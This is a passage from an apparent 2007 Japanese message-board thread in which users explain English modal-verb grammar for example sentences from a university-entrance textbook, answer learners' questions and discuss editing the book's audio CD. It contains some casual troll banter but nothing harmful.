「Will you...?」よりも積極的な勧誘を意味します(『英文法詳解』p.230)
(PEU §629-[5] では、「a pressing offer」と表現しています)。
該当箇所:
「§204 will の用法、(3) 相手の意志」

626 :勝手口 ◆KatteG.R4k :2007/01/17(水) 21:50:48
329.(助動詞:過去の強い意志を表す would)
S / offered / O1 / O2<some money>, // (文型:S V O O)
but // S / would not accept / O. (文型:S V O)

offer は、「(誰々に何々を)あげる/してあげると言う」という意味で、
相手が実際に受け取ったかどうかは分かりません(give だと相手は受け取ってます)。

3人称で will を使う場合、通常は単純未来を表しますが、
主に条件節内や否定文で、主語の意志を表すことができます。
否定文は拒絶を意味し、無生物主語でも使われます(comment欄参照)。
該当箇所:
「§204 will の用法、(2) 2,3人称の意志」
「§205 would の用法、(2) 過去の強い意志」

627 :勝手口 ◆KatteG.R4k :2007/01/17(水) 21:51:53
330.(助動詞:過去の習慣的動作を表す would)
S / would ((often)) tell / O1 / O2<interesting stories> / M2((when s v x)). (文型:S V O O)

will/would が、主語の「よくやる行動」を表すことがあります(状態動詞には使えません)。
ただし、will/would の用法としては特殊なものなので、はっきりと分かる文脈でないと使えません。
なので、通常は、often や always など頻度の副詞がつき、
would であれば、さらに過去を表す副詞要素が必要になります
(助動詞の過去形は、「現在/現実じゃない」と言っているだけで過去の話とは限りません)。
この would は、個人的な回想の文によく使われるそうです(江川 p.311)。
該当箇所:
「§204 will の用法、(4) 現在の傾向・習性・能力」
「§205 would の用法、(1) 過去の習慣」(「[注]used to と would の違い」を確認しておきましょう)

なお、現在の習慣は「現在形」でも表せますが、will を使うと「非難」などの感情が入ることがあります。
(『英文法詳解』p.230)
would も過去の行為に対する非難を表すことがあります。
参考:
「§205 would の用法、(6) 非難・いらだち」

when節内は、S / was / C (文型:S V C)

628 :名無しさん@英語勉強中:2007/01/17(水) 22:08:45
>>627勝手口氏
毎日毎日ご苦労様です。


629 :名無しさん@英語勉強中:2007/01/18(木) 18:55:32
I've always understood one should try and be considerate of others .

訳に

「人は他人に対して思いやりをもつように努めるべきだと私はいつも理解してきた」

ってあるんですけど、どうして「思いやりをもつように努めるべき」って訳になるんですか?

630 :勝手口 ◆KatteG.R4k :2007/01/18(木) 21:51:56
>>629
何番の例文でしょう?

try and do = try to do
ということです。
try and do は、命令文、助動詞の後、toの後(to不定詞)など、try が原型のときに使うことができます。
該当箇所:
「§222 〈S+V+to不定詞〉、[2]-[注]〈Try and 〜〉」
「§289 等位接続詞、[1]-(1) and、【6】 不定詞の代用」

ただ、always は、「ずっと、もともと、前々から」といった訳語の方が良いでしょうね。

こんなブログもありました。
ttp://diary.jp.aol.com/applet/ttd5xx88cyh/20050221/archive

631 :勝手口 ◆KatteG.R4k :2007/01/18(木) 21:52:58
331.(助動詞:話し手の意志を表す shall)
S / shall hear / O / M2((from O)) / M2((by O)). (文型:S V O)
With kind regards to <you (=all)>. (文型:手紙の結語)

2人称/3人称で使う shall は、話し手の意志を表します(主語の意志ではありません)。
今では使われないってことで有名でしょう。
読むときには注意が必要ですが、使うことはあまりないと思います。
該当箇所:
「§206 shall の用法、(1) 話し手の意志、【2】 主語が2人称,3人称の場合」

なお、法律文書/契約文書にかぎり、「3人称で使う shall」は今でも普通に使われます(というか shall が基本です)。
その文書の権利/義務や決まりごとを表しており、「〜するものとする」という訳語が定訳です。
英辞郎の例文:
Buyer shall have the right, upon reasonable notice to enter Maker's premises to recover the documents and drawings.
《契約書》買い手は、妥当な通知を行うことにより、メーカーの敷地に立ち入って、文書および図面を回収できるものとする。
参考:
「§206 shall の用法、(4) 約束・予言・規定」

With kind regards to... / Kind regards to... は、手紙の結語で「誰々さんによろしく」という意味です。
参考:
「§135 〈形容詞+-ly〉形の副詞、[2]-(2)-[参考]Sincerely yours」

632 :勝手口 ◆KatteG.R4k :2007/01/18(木) 21:53:59
332.(助動詞:相手の意志を聞く Shall I...?)
Shall / I / send / A((for O))? (文型:S V A)(疑問文)
M2((No)), / thank / you. (文型:(S) V O)
There's / no need {←for O}. (文型:There V S)(there構文)

現在の英語で shall を使うとしたら、「Shall I...?」「Shall we...?」という1人称疑問文がほとんどでしょう。
ただし、これもかなりフォーマルな印象を与えるようです(特にアメリカで)。
「Shall I...?」よりも、「Should I...?」「Do you want me to do...?」「Would you like me to do...?」、
「Shall we...?」よりも、「Should we...?」「Let's...!」、
というのが、日常的な口語表現らしいです。
(江川 p.217。『英文法詳解』p.233。『英語ライティングルールブック』p.257。『G3』shallの項)
該当箇所:
「§206 shall の用法、(2) 相手の意志を聞く」

There is no need for O / There is no need (for 人) to do は、定型表現なので憶えておきましょう。
参考:
「§394 Itを主語にした変換、(4) 〈It is 〜 (for …)+to不定詞〉の形になるもの」

633 :名無しさん@英語勉強中:2007/01/18(木) 22:18:03
[Abstract Verb] to [Concrete Verb]
=[Abstract Verb] and [Concrete Verb]
=[Abstract Verb] [Concrete Verb]
go to get it = go and get it = go get it
×get to go = get go


634 :勝手口 ◆KatteG.R4k :2007/01/19(金) 23:54:00
333.(助動詞:話し手の意志を表す shall)
S / has told / O1 / O2<that s v x>. (文型:S V O O)

that節内は、
S / is / ((too)) young ((to v o)), // (文型:S V C)
but // (he) / shall hear / O / M2((when s v c)). (文型:(S) V O)

too...to〜 については、例文3、例文137などを参照。
【直訳風】「お前は若すぎてその理由を理解できない」「その理由を理解するには、お前は若すぎる」
(直接話法で訳した方が日本語らしくなります。なので「彼」ではなく「お前」としておきます)

shall については、例文331を参照。
ここでは、that以下のセリフを言っている「the mother」の意志を表しています。

訳文の最後が「言った」となってますが、ちょっと過去形のイメージが強すぎるかもしれません。
「あの母親は息子さんに〜と言っているんですよ」くらいが良いかなと思います。
あと、個人的には but の前のカンマが気になったんですが(通常、S V X and/but V X ではカンマはつけない)、
出典は Frances Hodgson Burnett の『Little Lord Fauntleroy(小公子)』(1886年)でした。

635 :名無しさん@英語勉強中:2007/01/19(金) 23:55:43
今夜もお疲れ様です。

636 :勝手口 ◆KatteG.R4k :2007/01/19(金) 23:55:59
334.(助動詞:義務/当然を表す should)
S / is / a virtue {←that v x}. (文型:S V C)

that節(関係詞節)は、
A virtue / should be / practiced / M2((by O)). (文型:S V C)(受動態)
ってな形からの変形。
by の目的語は、those {←who / would succeed / A((in life))} (例文176参照)

should は、話し手の考える「主語にとって避けがたい事柄」ってイメージで、
話し手の主観的な価値観や論理に基づく「義務」「助言」「当然」を表します。
訳語は、「〜すべきだ」「〜が望ましい」「当然〜のはずだ」といったところでしょう。
該当箇所:
「§207 should の用法」

この例文の would は、「たとえ話」として意志や願望を表すものです。
訳例では、「should:義務、would:願望」で訳してますが、
「should:当然、would:意思」のニュアンスで訳すとこんな感じです。
【別訳】時間を守るというのは、人生で成功しようとする人なら当然のように実践している善行である。

637 :名無しさん@英語勉強中:2007/01/20(土) 08:18:58
自分としては例文30からの解説を先に進めていただきたい。
あくまで自分としては。

638 :名無しさん@英語勉強中:2007/01/20(土) 08:33:43
文句言ってる間におまえがやれ

639 :名無しさん@英語勉強中:2007/01/20(土) 09:40:24
637では無いが、西川口氏が解説済みの73までは30から解説する必要があるだろう。

ttp://fumufumuf.blog55.fc2.com/ ここの管理人、やってくれないかな。

640 :名無しさん@英語勉強中:2007/01/20(土) 10:42:03
誰かそいつに著作権と言うものを教えてやってくれ

641 :名無しさん@英語勉強中:2007/01/20(土) 12:21:29
大丈夫じゃね?アップと削除を繰り返すんだろ。
このスレ見てるなら、ある程度分かってるだろ。

642 :名無しさん@英語勉強中:2007/01/21(日) 00:37:57
test

643 :名無しさん@英語勉強中:2007/01/21(日) 00:58:24
>>641
キミが著作権というものをワカッテない!

644 : ◆IuJiIQCtrs :2007/01/21(日) 01:03:28
>>643
なら問題点と解決策を具体的に書けよ。

645 :名無しさん@英語勉強中:2007/01/21(日) 10:04:49
まぁ、全文掲載はやめておいた方がいいよな

646 :名無しさん@英語勉強中:2007/01/21(日) 10:20:15
>>645
君もたいして分かってなさそうだがw

647 :名無しさん@英語勉強中:2007/01/21(日) 17:43:01
Let's have a look at what the whether will be like . のhaveの訳し方(使い方?)を教えてください。

648 :名無しさん@英語勉強中:2007/01/21(日) 17:44:26
ロビー http://www.myspace.com/RobbyNinja
こいつ、Myspaceで下手な英語で叩かれ放しww

649 :名無しさん@英語勉強中:2007/01/21(日) 17:45:25
これは look at と同じ一種の名詞化表現よ。

650 :名無しさん@英語勉強中:2007/01/21(日) 17:49:52
そのうち伊藤のお世話になろうかな
受験終わったら

651 :名無しさん@英語勉強中:2007/01/21(日) 19:00:05
>>650
神様を呼び捨てにするなよw

652 :名無しさん@英語勉強中:2007/01/21(日) 19:03:36

エロって誰?
出口さん、勝手口さん、西川口さんとは違う人?


653 : ◆IuJiIQCtrs :2007/01/21(日) 19:17:33
これは酷い。
多重人格粘着自演多浪がセンター英語の形式変更でファビョったかw

654 :名無しさん@英語勉強中:2007/01/21(日) 20:43:11
伊藤キエロ

655 :勝手口 ◆KatteG.R4k :2007/01/21(日) 21:41:48
>>647
>>649さんの言うとおり、だいたい「have a look at O」≒「look at O」で良いと思いますけど、
「a」があるので「ちょっと目を向ける」という感じはあるかもしれませんね。
ロイヤルの該当箇所を挙げておきます。
「§169 be, do, have の用法、[3] have の用法、(3)-【4】 have a talk など」
「§72 名詞の慣用表現、[3] 〈動詞+名詞〉の慣用表現 名詞表現、【1】 have」
「付録1 類例リスト、30.《〈have a look〉などの言い方》」


335.(助動詞:実現しなかった過去の義務を表す should+完了形)
M2((Before s v x)), / S / should have read / O / M2. (文型:S V O)

before節内は、S / hand ((in)) / O (文型:S V O)
(in は副詞です。代名詞の場合、hand it in to 人 の語順になります)

「should+完了形」は、「〜すべきだった(のにしなかった)」という
実現しなかった過去の義務を表すことがあります(話し手の非難や後悔といった感情が入ります)。
該当箇所:
「§207 should の用法、(1) 義務・必要、【2】 義務の〈should have+過去分詞〉」

なお、「should+完了形」は、他にも「当然〜だったはずだ(のにそうならなかった)」という
実現しなかった過去の当然を表すこともあります。
参考:
「§207 should の用法、(2) 推量・当然、【2】 推量の〈should have+過去分詞〉」

「over and over (again)」は、副詞句で「何度も何度も」。

656 :勝手口 ◆KatteG.R4k :2007/01/21(日) 21:42:37
336.(助動詞:提案/要望/命令/決定などで使われる should)
S / ordered / <that s v x>. (文型:S V O)

that節内は、S / (should) be / set / SC (文型:S V C+主格補語)(S V O C の受動態)
あるいは、S / (should) be set / C (文型:S V C)(S V O C の受動態)
cf. They / set / all the slaves / free. (文型:S V O C)

おなじみ、「仮定法現在(米)か、should をつける(英)」パターンです。
事実/現実ではなく「たとえ話」、だけど、レールにのっけて「避けがたいもの」にしたい、
そんな感じのとき使われるんだと思います。
例文337の「感情の should」と混同しやすいので注意しましょう(例文173、174、177参照)
該当箇所:
「§207 should の用法、(5) 提案・要望・命令・決定などの表現」

657 :名無しさん@英語勉強中:2007/01/22(月) 00:15:32
30〜89 はどうなっているのでしょう?

658 :名無しさん@英語勉強中:2007/01/22(月) 01:09:50
半年英語だけやったけど今回センター114点でした。
浪人したら700選でできるようになるのを信じて頑張ります。

659 :名無しさん@英語勉強中:2007/01/22(月) 03:27:57
自動で曲の空白部分を検出して曲を分割してくれるソフトって無いんでしょうか?
CDの英文をひとつずつにするのがめんどくて…

660 :名無しさん@英語勉強中:2007/01/22(月) 07:36:37
>>647
haveとかtakeとかgiveを挟んで語調を和らげてるんだろ。

661 : ◆IuJiIQCtrs :2007/01/22(月) 09:49:13
>>658
それって700選を勉強するってレベルじゃねーぞ。
基礎から勉強しないと、解説があっても身につかない、ついていけないような状態。
ビジュアル英文解釈PART1すら、まともにこなせない状態だと思うんだが。

読解は、西の基本はここだ、薬袋のリーディング教本
文法は、安河内のゼロからスタート英文法、伊藤の英文法のナビゲーター
などを勉強するのが先。

662 : ◆IuJiIQCtrs :2007/01/22(月) 10:21:48
>>661
受験板にすっこんどいてもらえる?

663 :名無しさん@英語勉強中:2007/01/22(月) 10:55:11
>>661-662が見えない

664 :名無しさん@英語勉強中:2007/01/22(月) 11:31:11
これも酷い。
多浪多重人格粘着自演荒らしが狂ってきたな。
精神科行ってこい。

665 :名無しさん@英語勉強中:2007/01/22(月) 12:50:19
まあ、落ち着け。

666 :名無しさん@英語勉強中:2007/01/22(月) 14:15:20
>>666なら工口が別トリor名無しで復活

667 :658:2007/01/22(月) 15:47:28
>>661
それがポレポレとかは普通に読めるし、文章は読めるんだが問題が解けないんだ…。

700選スレなのにごめんなさい

668 :名無しさん@英語勉強中:2007/01/22(月) 16:32:39
He came back from a day's work all wet .   

come back は自動詞だと思うんですけど形容詞のwetはどこにかかるんですか?

669 :名無しさん@英語勉強中:2007/01/22(月) 17:30:44
John found it difficult to make himself look pleased .

の look pleased は make の補語ですか?

670 :名無しさん@英語勉強中:2007/01/22(月) 17:35:41
通りすがり。

>>668
he is wetの関係を見抜きましょう。

>>669
そう。

671 :名無しさん@英語勉強中:2007/01/22(月) 18:41:38
>>661
君はMかね?

672 :名無しさん@英語勉強中:2007/01/22(月) 18:47:21
>>671
ええ。Mankoです。

673 :勝手口 ◆KatteG.R4k :2007/01/22(月) 23:23:22
337.(助動詞:感情の should)
Is / it / any wonder / <that s v x>? (文型:S V C)(疑問文)(形式主語のit:真主語がthat節)

that節内は、S / should have failed / A((in O)) (文型:S V A)

「感情の should」と呼ばれる用法で、話し手の主観的な感情を表します(例文4、174、177参照)。
「避けがたい事柄/避けられなかった事柄」に対して
「おいおいそんなレールが敷かれてんのかよ、まぁびっくり/残念だなぁ/当然だろ」
といった感じを表してるんだと思います。
感情をこめずに単に事実を述べるのであれば、直説法になります(例文336との違いに注意)。
該当箇所:
「§207 should の用法、(4) 主観的判断や感情の強調の表現」

674 :勝手口 ◆KatteG.R4k :2007/01/22(月) 23:25:05
338.(助動詞:感情の should)
Who / should come / A((in)) // but O? (文型:S V A)(who疑問文:主格)

wh疑問文でも「感情の should」を使うことがあります。
反語を表したり、「びっくり should」(江川 p.304)だったりします。

例文338は、決まった形なので憶えておきましょう(but は前置詞かもしれませんが、よくわかりません)。
この形は、ピリオドで終わることもあります。
該当箇所:
「§207 should の用法、(4) 主観的判断や感情の強調の表現、【2】 why, who, how などで始まる疑問文で」

but の後は、
the {very→} man {←(who/whom) we were talking of}
cf. We / were talking / A((of the man)). (文型:S V A)

675 :名無しさん@英語勉強中:2007/01/23(火) 05:29:27
>>670
どこにisがあるの?
(being)all wet[分詞構文]か
(with his clothes) all wet[付帯状況]
なんじゃないの?
まあisの「関係」と言えば関係か。

>>666
>>675のように結構密かに茶々入れてたりする悪寒。


676 :名無しさん@英語勉強中:2007/01/23(火) 11:24:49
>>675
おまえかよ!
まあ名無しなのでゆする

677 :名無しさん@英語勉強中:2007/01/23(火) 19:17:59
He came back from a day's work all wet .   

(with his clothes) all wet[付帯状況]ってどういう意味ですか?


John found it difficult to make himself look pleased .

look は動詞だと思うんですけど補語になるんですか?

678 :名無しさん@英語勉強中:2007/01/23(火) 20:43:15
700選やるレベルじゃねーつーことだ。
簡単な文法の本でも読めば自分で解決できる。

679 :名無しさん@英語勉強中:2007/01/23(火) 21:30:13
678は答えてやれよ、お前みたいなヤツ邪魔だぞ

680 :名無しさん@英語勉強中:2007/01/23(火) 21:37:16
Even when living with a good friend of yours , there are so meny difficulties to deal with .

Even when living with a good friend of yours の訳し方を教えてくれませんか?

681 :名無しさん@英語勉強中:2007/01/23(火) 21:43:10
It was suggested that he give up sugar .

のsugarはどうして give up の目的語になれるんですか?

682 :名無しさん@英語勉強中:2007/01/23(火) 23:16:52
>>679
sageと安価ができるようになるまでロムってろ

683 :名無しさん@英語勉強中:2007/01/23(火) 23:47:26
ここにクダラネー質問しに来るなよ

684 :名無しさん@英語勉強中:2007/01/23(火) 23:50:59
荒らしの手法を変えてきたのか・・・うぜぇ

685 :名無しさん@英語勉強中:2007/01/24(水) 02:05:30
このサイト書籍化しないかな?www
駿台文庫から700選の全例文解説出して欲しいんだがなぁ

686 :名無しさん@英語勉強中:2007/01/24(水) 04:41:05
空気嫁よ

687 :名無しさん@英語勉強中:2007/01/24(水) 08:44:06
>>685
書籍化したらそれこそ著作権の問題が...
その前にサイトを充実させた方がいいんじゃない?

>>680
(仲の)いい友達と一緒に過ごしてる(生活してる)時でさえも
分詞構文で接続詞の意味を強調したい(分かるように残したい)ときは
省略しない事もある。その接続詞をevenで強調。

>>681
なれるよ。give it upとかいうでしょ?目的語が代名詞じゃなければEnd-focusingでupの後ろに持ってくる事が多い。
つまりgive(V) up(adv/M) sugar(O)

質問は専門スレで。

688 : ◆IuJiIQCtrs :2007/01/24(水) 22:22:02
これ見て勉強しなさい。
ttp://www.hellodamage.com/tdr/archive/6diary/sexbook2/index.html

689 :勝手口 ◆KatteG.R4k :2007/01/24(水) 23:28:42
339.(助動詞:感情の should)
There / is / no reason {←why s v x}. (文型:There V S)

why節内は、S / shouldn't do / such a thing (文型:S V O)

wh疑問文の「感情の should」です(例文338参照)。
肯定文のとき「〜すべき」と訳すと誤訳になっちゃいますので注意。

「There is no reason why...」は、定型表現として憶えておくと便利だと思います。
why節には、should 以外にもいろいろな法助動詞がきます。
why が省略されることもあります(例文140参照)。
参考:
「§207 should の用法、(4) 主観的判断や感情の強調の表現、【2】 why, who, how などで始まる疑問文で」
「§313 関係副詞の省略、(2) why の場合」

690 :勝手口 ◆KatteG.R4k :2007/01/24(水) 23:29:36
340.(助動詞:would like to do)
M2((As s v x)),/ I / would like / to v x. (文型:S V O)

as節内は、S / have / O {←to talk ((over)) M2}
cf. talk something ((over)) / M2((with 人))
(talk over something の語順も可能ですが、あまり使われないようです)

would like to do の to不定詞のところは、
call / A((on O)) / M2((between O1 and O2)) / M2((tomorrow afternoon)) (文型:(S) V A)

いきなり、would なんでびっくりですが、旧版では「should like to」だったのかもしれませんね。
法助動詞の過去形が「丁寧」を表すものです(例文327など参照)。
該当箇所:
「§205 would の用法、(10) would を用いた慣用表現、【1】〈would like to 〜〉」
「§207 should の用法、(3) 控え目な表現」

691 :名無しさん@英語勉強中:2007/01/25(木) 00:18:04
昔どっかのスレで揉めてたけど
likeは好きから転じて軽い欲しいの意味にもなる。

692 :名無しさん@英語勉強中:2007/01/25(木) 02:29:18
700選なんて今でも使う人がいるのか?

693 :名無しさん@英語勉強中:2007/01/25(木) 22:27:11
>>692
いるからこのスレがあるんだろうが
そういうことを考えてから書き込め

694 :勝手口 ◆KatteG.R4k :2007/01/25(木) 22:54:40
>>692
Amazonの「受験対策」コーナーだと、「売れている順番」14980件中18位だそうです。
けっこう売れてるみたいですね。


341.(助動詞:可能性を表す can)
S / cannot be / ((so)) C ((as to v x)). (文型:S V C)

to不定詞のところは、
indulge / A((in O)) / M2((at the expense of O)) (文型:(S) V A)

「so 形容詞/副詞 as to do」の呼応については、下記参照。
該当箇所:
「§142 程度・強調の副詞、[2] so と too の用法、(2)-【1】〈so 〜 as to do〉〈so 〜 that …〉」
「§219 to不定詞の副詞用法、[2] 形容詞・副詞を修飾する用法、(2) 程度を示す」

can が可能性(〜でありうる)を表す場合、1%でもその可能性があれば成立します。
それを否定する cannot は「1%もその可能性がない=可能性0」という意味になります。
該当箇所:
「§198 can, could の用法、[1] can の用法、(2) 可能性」
「§198 can, could の用法、[2] could の用法、(3) 可能性」

695 :勝手口 ◆KatteG.R4k :2007/01/25(木) 22:57:00
342.(助動詞:過去の事柄の可能性を否定する cannot+完了形)
S / started / M2((just now)), // (文型:S V)
so // S / cannot have gone / A((so far)). (文型:S V A)

「cannot+完了形」は、「〜したはずがない」という意味で、
話し手が、主観的に、過去の事柄についてその可能性を否定しています。
この形が「能力」や「許可」を表すことはありません(『英文法詳解』p.357)。
該当箇所:
「§198 can, could の用法、[1] can の用法、(3) 強い疑い・否定的な推量[可能性]、【3】〈can't have+過去分詞〉」
「§198 can, could の用法、[2] could の用法、(4) 強い疑い・否定的な推量[可能性]、【2】〈could have+過去分詞〉」
「§214 不定詞の完了形、[2] 完了不定詞の用法、(2) 助動詞 may,must,cannot などとともに用いる」

696 :名無しさん@英語勉強中:2007/01/25(木) 23:52:34
解説本の書籍化について。

PDFでの電子出版が適していると思う。
英文と日本語訳は、Acrobatの体験版(30日有効)を使って
読者に入力してもらう。
ttp://pc.nikkeibp.co.jp/article/NPC/20060401/234106/
入力がめんどい人は本編と併用すればいいだけだし。

-----------------------
1. ____________________
   ____________________

  一見 walk は補語のように見えるが、名詞が副詞的に働く
  特殊な用法であって、これは五文型でいうところの第一文型である。
  It は...
-----------------------

これなら駿台文庫も予備学校も文句がつけられない。
使うほうとしても一回手で入力するので記憶に定着しやすかろう。

私は、勝手口氏らの文法解説がひととおり済めば、
上のような形式にして LaTex で組版してみようと思う。
A5サイズに1ページあたり5つ解説を載せて140ページ。
A4用紙で両面印刷すれば35枚で済むし、
ホットボンド使って個人で安く製本もできる。
ttp://www.geocities.jp/ryou_tanoue/bind/musen/s3.htm
まあ別に一冊にしなくても上下冊とか4分冊で持ち運びを重視してもいいし。

勝手口氏はじめ著作者の許可があればpdfとかで公開できる。
そのときはみなさん校正に協力してやってください。

697 :名無しさん@英語勉強中:2007/01/26(金) 00:53:32
まとめサイトの管理人に対する嫌がらせか?

698 :名無しさん@英語勉強中:2007/01/26(金) 09:32:50
そんなことより、西川口さんはどうしちゃったの?

699 : ◆IuJiIQCtrs :2007/01/26(金) 18:55:38
>>698
前回の>>573は鯖移転に気づかなかったんだろうけど.
忙しいか規制に巻き込まれてるかじゃね。事故,病気も考えられなくもないが.
ということで規制回避ツールp2
ttp://p2.2ch.net/

700 :593:2007/01/27(土) 00:08:58
>>696
おぉ、すごいっすね。楽しみです。

>>698
西川口氏がいないのは気になりますね。
まさかやめちゃった?

CDの余白と番号削って、100分を10っぷんに圧縮したたやつが
あるけど、さすがにUpできないな。
効率のいい削り方知りたい人とかいる?いたら書き込もうと思う。

701 :名無しさん@英語勉強中:2007/01/27(土) 00:53:02
>>700
CDは確かに番号ジャマかも。
削り方、ぜひ書き込んでください。

702 :名無しさん@英語勉強中:2007/01/27(土) 01:33:12
番号読み上げは手作業で削除するしかない。
俺は spwave っていうソフトを使った。
CD -> wav -> spwaveで編集 -> mp3
削除して65分になった。

編集に3時間くらいかかったけど、本気で勉強する人は
何回も聞くことになるから、この時間をすぐに取り返せるよ。

703 :名無しさん@英語勉強中:2007/01/27(土) 14:55:31
>>702
そのMP3を速度変換してiーPODで持ち歩きたいのですが
何か良いソフトありますか?

704 :593:2007/01/27(土) 16:16:20
俺の削ったやり方を書き込んでみる。
まず、CD2WAV32 ってソフト
ttp://www.forest.impress.co.jp/lib/pic/music/mp3/cd2wav32.html
で、CDにはいってる音楽をmp3で取り込む。そのあと、SoundEngine ってソフト
ttp://www.forest.impress.co.jp/lib/pic/music/soundedit/soundengine.html
をダウンロードして、展開する。そのあとvbmp3ってソフト
ttp://www.vector.co.jp/download/file/win95/prog/fh125201.html
をダウンロードして展開する。出来たファイルの中に入ってるvbmp3.dllってファイル
とCD2WAV32の中に入っているgogo.dllってファイルをsoundengineのbinってファイルの中に入れる。
そうすると、soundengineでCDから取り込んだmp3ファイルを開ける。
後はsoundengineで、要らない部分の 削除→保存 を繰り返す。
soundengineは、設定→開くと同時に再生、のチェックをはずしておくと吉です。

ややこしそうだけど、それほど難しい作業じゃないよ。
>>703
俺も探してる、いいソフトが見つからない。

705 :名無しさん@英語勉強中:2007/01/27(土) 16:41:55
>>700 100分が10分にほんとになるの?

706 :593:2007/01/27(土) 22:59:26
>>705
100分→100文、10っぷん→10分
訂正よろ

707 :勝手口 ◆KatteG.R4k :2007/01/28(日) 21:19:40
>>696
なんかすごいのできそうですね。俺のは好きに使ってくれて結構です。


343.(助動詞:cannot help -ing)
M2((If s v x)),/ S / cannot help / O<v-ing x>. (文型:S V O)
M2((If s v x)),/ S / cannot but object / A((to O)). (文型:S V A)

if節内は、S / want / O<to v o> (文型:S V O)
live の目的語は、<a {peaceful and democratic→} life>

「〜せざるをえない」という訳語が定番ですが、
「(意志とは関係なく/意志とは逆に)〜することを止めることができない」といった感じです。
(『受験英語禁止令』p.5 参照。『PEU』§126, "you can't stop yourself, even if you don't want to do it")
なお、「cannot but 原形」は文語で、2つを混同した「cannot help but 原形」が米口語、だそうです。
該当箇所:
「§198 can, could の用法、[1] can の用法、(8) can を用いた慣用表現」
「§230 原形不定詞を用いた慣用構文、(3) 〈cannot but+原形不定詞〉」

なお、目的格(=動名詞の意味上の主語)が入る形もあります。
「cannot help O -ing」=「Oが〜するのは、(文の主語)にはどうしようもない/止めようがない」
(江川 p.359。安藤 p.267)

708 :勝手口 ◆KatteG.R4k :2007/01/28(日) 21:21:04
344.(助動詞:cannot...too)
S / cannot be / ((too)) C / A((in O)). (文型:S V C A)

「基準をオーバーしようとしても、できない/あり得ない。
 なぜなら、その基準は、はるか上空のかなた、カリン様が居るところぐらいにあるのだから」
といった表現です。
逐語訳だとロジックを見失うことがあるので注意しましょう
(ただし、文字通りに解釈できることもあります。not の作用域に注意が必要です。江川 pp.163-164)。
該当箇所:
「§198 can, could の用法、[1] can の用法、(8) can を用いた慣用表現」
「§377 否定を表す慣用表現、[2] 注意すべき否定形の慣用表現、【10】〈cannot … too〉」

「the choice of our friends」を文にするとこんな感じ。
cf. We / choose / our friends. (文型:S V O)
文→名詞句のポイント:主語→省略、動詞→名詞、目的語→of句


345.(助動詞:cannot...over-)
S / cannot be / overestimated. (文型:S V C)(受動態)

例文344と同種の表現です。
接頭辞overのつく語、enough、sufficiently でも同じロジックになります。
該当箇所:
「§198 can, could の用法、[1] can の用法、(8)-[注]cannot 〜 too…の同義表現」

709 :勝手口 ◆KatteG.R4k :2007/01/29(月) 21:56:45
346.(助動詞:許可を表す may)
S / says / <(that) s v x>, // (文型:S V O)
so // S / think / <(that) s v x>. (文型:S V O)

前半部のthat節内は、S / may go ((on)) / A((to O)) (文型:S V A)
後半部のthat節内は、S / will prepare / A((for O)) (文型:S V A)

may が「許可」を表す場合、「人が人に与える許可」を意味します(『英文法詳解』p.343)。
なので、「You may...」は、かなり傲慢な感じです。対等な関係なら「You can...」です
(can の「許可」は「周囲の事情が許す許可」。江川 pp.295-296)。
逆に「May I...?」は「お許しをいただけますか?」といったへりくだった言い方で丁寧になります
(ただ堅苦しい表現になるので、友達とかなら「Can I...?」で大丈夫だと思います)。
該当箇所:
「§199 may, might の用法、[1] may の用法、(1) 許可」
「§199 may, might の用法、[2] might の用法、(1) 許可」


347.(助動詞:許可を表す may)
May / I / help / you? (文型:S V O)(疑問文)
M2((No)), / thank / you. (文型:(S) V O)

「May I help you?」は、自発的に手助けするときの決まり文句ですね。
店員に「May I help you?」と言われたら、「いらっしゃいませ」よりも
「どのような品物をお探しですか/ご注文はお決まりですか?」と考えた方がよいと思います。
何らかの返事をしないとダメらしいです。

「No, thank you.」は、通常は「いいえ、おかまいなく」くらいだと思いますが、
言い方によっては「余計なお世話だ!」になったりします。

710 :勝手口 ◆KatteG.R4k :2007/01/30(火) 22:03:48
348.(助動詞:推量を表す may)
It / may begin / <to v> / M2, // (文型:S V O)(天候を表す非人称のit)
so // S / think / <(that) s v x>. (文型:S V O)

that節内は、S / had better give ((up)) / O (文型:S V O)

may は「〜かもしれない(そうでないかもしれない。50%ずつ)」という話し手の認識/推測を表します。
might だと、話し手の確信度が下がります(過去ではありません)。
該当箇所:
「§199 may, might の用法、[1] may の用法、(2) 推量」
「§199 may, might の用法、[2] might の用法、(2) 推量」

「had better」については、例文359参照。
該当箇所:
「§213 to不定詞と原形不定詞、[2] 原形不定詞、【4】 慣用表現」
「§230 原形不定詞を用いた慣用構文、(1) 〈had better+原形不定詞〉」
「§270 仮定法を含む慣用表現、[4]-(2) 〜had better」


349.(助動詞:過去の推量を表す may+完了形)
S / may have made / O / M2((in translation)). (文型:S V O)

「may+完了形」は、「〜したかもしれない」という過去の事柄に対する推測を表します。
この形が「許可」を表すことはありません(『英文法詳解』p.348)。
該当箇所:
「§199 may, might の用法、[1] may の用法、(2)-【2】〈may have +過去分詞〉」
「§199 may, might の用法、[2] might の用法、(2)-【2】〈might have+過去分詞〉」

711 :名無しさん@英語勉強中:2007/01/30(火) 23:09:33
>>707>>710
今日はたくさんうpりましたね。
うれしい限りです。

712 :名無しさん@英語勉強中:2007/01/30(火) 23:09:48
おつかれっす

713 :名無しさん@英語勉強中:2007/01/30(火) 23:26:05
勝手口氏の解説は、明日で350だ。


2008年度入試に間にあわNEEEEEEEEE

714 : ◆IuJiIQCtrs :2007/01/31(水) 00:57:19
>>713
700選が合否に影響を与える学校は存在しないだろ。
それ以前のレベルの物を身につけておけば、点差はほとんどつかない。

715 :名無しさん@英語勉強中:2007/01/31(水) 02:53:32
>>714
エロ消エロ

716 : ◆IuJiIQCtrs :2007/01/31(水) 02:57:55
>>715
オマエが消エロ

717 :名無しさん@英語勉強中:2007/01/31(水) 07:58:05
大体そいつエロくないし。

オレが工口だ。相手を間違えるな。

718 :名無しさん@英語勉強中:2007/01/31(水) 12:07:19
皆さんは、どのロイヤル英文法を使っていますか?
Amazonで調べたら、何種類かあったので。本屋に行って比べたいのですが、近くに無いので、できれば参考にさせてください。

719 :名無しさん@英語勉強中:2007/01/31(水) 13:41:17
何でこのスレなんですか?

720 :名無しさん@英語勉強中:2007/01/31(水) 15:04:53
700選を自分で調べるためなんじゃないの?

721 :名無しさん@英語勉強中:2007/01/31(水) 15:06:35
>>482>>484

722 :名無しさん@英語勉強中 :2007/01/31(水) 15:16:21
>>718

勝手口 ◆KatteG.R4k :2006/11/08(水) 21:18:53
改めまして、勝手口と申します。
『徹底例解 ロイヤル英文法 改訂新版』を参照しながら、
『700選』の例文で使われている文法について考えていこうと思います。
参考文献は、他に、
江川泰一郎『英文法解説 改訂三版』(「江川」と表記)
